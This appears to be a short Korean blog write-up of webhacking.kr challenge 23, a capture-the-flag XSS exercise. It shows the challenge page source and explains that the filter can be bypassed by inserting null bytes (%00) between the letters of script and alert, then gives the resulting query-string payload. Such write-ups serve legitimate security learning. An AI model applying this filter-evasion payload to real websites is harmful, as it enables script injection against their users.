Your mission is to inject <script>alert(1);</script>
미션이 주어졌다!
일단, 페이지 소스는 다음과 같다!
| <html> | |
| <head> | |
| <title>Challenge 23</title> | |
| <style type="text/css"> | |
| body { background:black; color:white; font-size:10pt; } | |
| input { background:silver; color:black; font-size:9pt; } | |
| </style> | |
| </head> | |
<body> | |
| <form method=get action=index.php> | |
| <table border=0 cellpadding=10> | |
| <tr><td><input name=code></td><td><input type=submit></td></tr> | |
| </table> | |
| </form><br><br> | |
| Your mission is to inject <script>alert(1);</script> | |
| <br><br> | |
| </body> | |
</html> | |
<script>alert(1)</script>를 넣어주면 되는데, 각 글자는 필터링되지 않지만, 묶여 있으면 필터링 되어 중간중간에 널바이트를 넣어주면 된다!
?code=<s%00c%00r%00i%00p%00t>a%00l%00e%00r%00t(1);</s%00c%00r%00i%00p%00t>
'웹 해킹 > webhacking.kr' 카테고리의 다른 글
| webhacking.kr 36번 (0) | 2018.02.12 |
|---|---|
| webhacking.kr 33번 (0) | 2018.02.11 |
| webhacking.kr 20번 (0) | 2018.02.10 |
| webhacking.kr 47번 (0) | 2018.02.10 |
| webhacking.kr 58번 (0) | 2018.02.10 |
